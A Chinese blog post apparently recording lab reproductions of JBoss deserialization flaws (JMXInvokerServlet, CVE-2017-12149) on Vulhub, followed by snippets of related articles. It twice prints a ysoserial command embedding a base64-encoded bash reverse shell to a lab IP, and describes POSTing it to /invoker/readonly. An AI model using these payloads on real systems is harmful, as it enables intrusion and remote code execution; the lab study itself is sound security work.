jboss漏洞复现

最新推荐文章于 2025-05-10 07:45:59 发布
原创 最新推荐文章于 2025-05-10 07:45:59 发布
· 789 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #java

JBoss JMXInvokerServlet 反序列化漏洞

https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/
https://paper.seebug.org/312/
https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/

JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。
在这里插入图片描述
访问192.168.33.130:8080/invoker/JMXInvokerServlet只要有文件下载,目标网站即存在JBoss JMXInvokerServlet 反序列化漏洞。
在这里插入图片描述

JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象,所以我们直接将ysoserial生成好的POC附在POST Body中发送即可。

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

在这里插入图片描述在这里插入图片描述

EXP,比如DeserializeExploit.jar,直接用该工具执行命令、上传文件即可:
(工具不给力呀)
在这里插入图片描述

https://bbs.ichunqiu.com/thread-26613-1-1.html

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg

在这里插入图片描述
所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。

编写反弹shell的命令

使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码:http://www.jackson-t.ca/runtime-exec-payloads.html
在这里插入图片描述
得到编码后命令

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}

序列化数据生成

使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

发送POC

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:
不知道为啥不成功
在这里插入图片描述

成功反弹shell:
并没有
在这里插入图片描述

https://blog.youkuaiyun.com/Jerry____/article/details/103506224
在这里插入图片描述

https://www.cnblogs.com/yuzly/p/11240145.html
这个工具 ↓ 可以 https://github.com/yunxu1/jboss-_CVE-2017-12149
在这里插入图片描述

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

在这里插入图片描述。。。

中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4635
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
CVE-2017-12149JBOSS漏洞复现
ranuy阮的博客
05-07 1875
漏洞描述 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据...
Jboss漏洞复现(附带修复方法)
C233333235的博客
08-07 1602
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。
Jboss漏洞复现
最新发布
m0_72199724的博客
05-10 592
序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。问题的根源在于类ObjectInputStream在反序列化时,没有对生成的对象的类型做限制。
JBOSS漏洞复现
weixin_33117513的博客
11-17 177
合集 - 漏洞复现(6)1.mysql弱密码爆破10-282.Tomcat弱口令上传war包10-273.Hadoop未授权访问11-014.Redis未授权访问11-035.weblogic历史漏洞11-146.JBOSS漏洞复现11-16收起 Jboss漏洞复现 统一靶场:/vulhub/jboss JMX Console 未授权访问漏洞 # 介绍 JBosswebUI界面 http:/...
JBoss漏洞复现(保姆级教学)
m0_69043895的博客
04-25 960
漏洞原理:该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞。这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码。在自己服务器上部署一个webshell的war包。然后再压缩成war文件。
JBoss 相关漏洞复现及利用
weixin_45908624的博客
09-21 1381
JBoss Application Server 相关漏洞复现
Jboss反序列化漏洞复现与原理
LJH1999ZN的博客
03-29 5411
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss反序列化漏洞,CVE-2017-7504 漏洞存在/jbossmq-httpi
常见中间件漏洞复现之【Jboss】!
muyuchen110的博客
08-06 1123
Jboss介绍JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。漏洞介绍影响范围。
漏洞复现JBoss 中间件漏洞
qq_48368964的博客
08-06 1623
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。
jboss安全漏洞修补方法
03-01
帮助修补JBOSS安全漏洞,防止别人黑进你的服务器。
jboss中间件漏洞复现
mingyqf的博客
02-15 1560
参考:https://blog.youkuaiyun.com/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
漏洞复现JBoss漏洞总结
qq_45751902的博客
10-31 1865
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
Jboss 漏洞复现
2301_80402555的博客
09-22 852
2、找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署。4、制作war包 填写war包远程地址。
JBoss 漏洞复现
m0_43397796的博客
03-02 4224
JBoss 漏洞复现 CVE-2017-12149 JBoss AS 5.X/6.X反序列化漏洞 漏洞扫描 试验地址:https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECIDb56f-ab5c-4e92-840f-d59299ec273f 由于实验指导书上的ip有错误,所以先nmap扫描一下ipnmap -sn 10.1.1.0/24 发现4个ip 全端口扫描nmap -p- -sV -T4 10.1.1.254 10.1.1.135 10.1.1.9
jboss反序列化漏洞复现(CVE-2017-7504)
WY92139010的博客
07-31 647
jboss反序列化漏洞复现(CVE-2017-7504) 一、漏洞描述 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二、漏洞环境搭建以及复现 1、使用docker搭建漏洞环境...
漏洞复现 nuclei
12-30
### 使用 nuclei 工具进行漏洞复现 #### 安装与配置 Nuclei 为了使用 `nuclei` 进行漏洞检测,需先安装该工具。可以通过以下命令完成安装: ```bash go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest ``` 确认环境变量已正确设置以便能够全局调用 `nuclei` 命令。 #### 获取模板库 Nuclei 的强大之处在于其丰富的社区贡献模板集合。这些模板定义了各种类型的漏洞测试方法。要更新本地模板库可运行如下指令: ```bash nuclei -update-templates ``` 这会自动同步最新的官方模板到本地机器上。 #### 执行基本扫描操作 对于特定目标执行快速的安全评估可以采用简单的方式启动扫描过程: ```bash nuclei -u http://example.com/ ``` 上述命令将会针对指定URL发起一系列预设好的安全检查动作并输出结果。 #### 针对具体 CVE 编写自定义 POC 或应用现有模版 当面对像 JBoss 反序列化这样的复杂场景时,则可能需要依赖于更详细的定制化脚本或是找到已经存在的对应CVE编号的核芯规则文件来实施进一步验证工作[^2]。 例如,在处理 **CVE-2017-12149** 时,如果存在相应的 nuclei 模板可以直接利用它来进行自动化探测;如果没有的话则可以根据公开资料自行编写匹配条件和载荷部分。 #### 结合其他工具增强效果 有时仅靠单一手段难以达成理想的效果,这时不妨考虑与其他辅助软件相结合以提高效率。比如前面提到过的 JavaDeserH2HC 就是用来生成恶意 payload 并配合 nuclei 实现远程代码执行漏洞的实际攻击面模拟演练。 另外值得注意的是,在某些情况下还需要额外准备一些必要的组件如 JDK 环境以及相关 jar 文件等才能顺利完成整个流程。 #### 处理通知机制 一旦完成了所有的测试活动之后还可以借助外部服务发送消息提醒相关人员关注发现的问题。例如向 Telegram 发送消息告知任务已完成: ```bash echo "nuclei 漏洞扫描结束" | notify -silent -provider telegram [^1] ``` 以上就是基于 nuclei 开展漏洞重现工作的主要步骤概述。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值